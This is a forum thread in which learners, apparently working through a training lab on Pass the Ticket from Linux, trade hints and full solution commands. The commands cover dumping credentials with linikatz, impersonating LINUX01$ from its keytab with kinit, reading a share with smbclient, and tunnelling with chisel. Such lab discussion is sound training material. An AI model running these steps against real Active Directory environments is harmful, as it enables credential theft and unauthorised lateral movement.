Pass the Ticket Linux - last question

Hi guys,
I’m so terribly stuck on the last question which is:

Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

Can you give me some hint on where to find this linux ticket? I’m root on svc_workstations but can’t seem to find a valid ticket and keep getting access denied each time I try to connect to dc01/linux01 with smbclient. Many thanks in advance

consider using linikatz.sh

(you need to transfer the file)


is this the one I’m looking for?

Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB

I transferred linikatz.sh and still can’t seem to see the proper ticket. Those I tried each gave me a message “no valid credentials found”.

Here is a suggestion for you: download linikatz from the attack machine (Kali or Pwnbox), then use base64 to encode it and decode it with base64 on the linux01 (root privilege) machine. From there, as instructed in the section, you will find the ticket cache right at the beginning of the scan results.

Hi, thanks a lot. I did it before but I made a terrible mistake and provided a wrong path while assigning the variable. I don’t know why I kept root in the path. Solved it now and I feel relieved. Many thanks for your response. Have a good day

I transferred linikatz.sh to Linux01 and ran it there. Got the credentials in the folder. Tried the files under kerberos-check ending with .conf and .keytab with path /etc. Didn’t work. Also tried ccache files and no result. Am I looking for only NTLM hash?

If you have access to root user credentials on svc_workstations, try using the kinit utility to reacquire the Kerberos ticket. After this, you can try to connect to the \\DC01\linux01 resource with smbclient using the received ticket. Remember to also check that you entered the correct username and password when you receive your ticket using kinit.

Thank you. Got it solved.


If anyone else is struggling.

Run Linikatz

You'll notice a keytab in /etc in the output

kinit LINUX01$ -k -t /path/to/keytab

Then

smbclient //dc01/linux01 -k -c "get /flag.txt /root/flag.txt"


Hello sir, may I kindly ask you how you know we can use that particular file to impersonate? I got the solution but I don't clearly understand why I can use this particular file /etc/*** for the impersonation.

duuuude you are a hero

Hello Guys,

I have an issue and I have been stuck for more than 3 hours with this question:

Check the /tmp directory and find Julio’s Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.

I loaded the ccache file in the env variable and it shows up in my klist output

When I try to connect to the remote server it doesn’t grant me the permission

I tried other alternatives like:

smbclient //172.16.1.10/julio -k -c 'ls' -U julio@INLANEFREIGHT.HTB

I’m aware that the ticket changes every 5 min or something, so I always update my env variable with the newly generated ticket and retry, but sadly nothing …

You used the wrong ticket. Look at the expiration date, you need to use the other one. Check the expiration date with klist, when it is valid you can use smbclient.

Commenting to stay updated, because I’m currently studying this module.
When I reach this question I’ll come back and post my methodology of approaching it.

Ensure you are exporting the ticket in the correct directory. I wasted several hours only to realize that the path I used was root and that I was performing operations in the home directory. In my case I changed the path of export to home directory.

  1. Request a valid ticket using kinit.
    kinit -k -t /etc/krb5.keytab 'LINUX01$@INLANEFREIGHT.HTB'

  2. Export it to home directory
    export KRB5CCNAME=FILE:/home/svc_workstations@inlanefreight.htb/ccache_INLANEFREIGHT.HTB

  3. klist

  4. smbclient

Done.

I'm stuck on the first part of the last question

so I’ve done the following
added these to the /etc/hosts file

172.16.1.10 inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01
172.16.1.5  ms01.inlanefreight.htb  ms01

added to the /etc/proxychains4.conf

socks5 127.0.0.1 1080

followed the commands to install chisel and have it running like so

2025/03/01 14:06:56 server: Reverse tunnelling enabled
2025/03/01 14:06:56 server: Fingerprint p/jlzhQaokullD6arhj71UoR+PbqPNb/C3+AODdxTVw=
2025/03/01 14:06:56 server: Listening on http://0.0.0.0:8080

initiated xfreerdp
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution

Now here’s the issue,

I run chisel but it never connects

c:\tools>c:\tools\chisel.exe client 10.10.16.45:8080 R:socks
2025/03/01 08:18:04 client: Connecting to ws://10.10.16.45:8080
2025/03/01 08:18:25 client: Connection error: dial tcp 10.10.16.45:8080: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
2025/03/01 08:18:25 client: Retrying in 100ms…

I can't work out what the issue is